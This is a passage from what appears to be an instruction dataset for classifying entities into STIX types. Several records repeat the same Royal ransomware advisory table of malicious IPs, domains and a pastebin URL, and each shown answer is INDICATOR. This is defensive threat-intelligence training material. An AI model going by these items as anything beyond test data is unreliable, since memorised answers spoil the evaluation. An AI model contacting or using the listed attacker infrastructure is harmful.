2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n197.207.218.27\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n140.82.48.158\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n81.184.181.215\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n197.94.67.207\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nmyappearinc.com\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n197.204.247.7\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
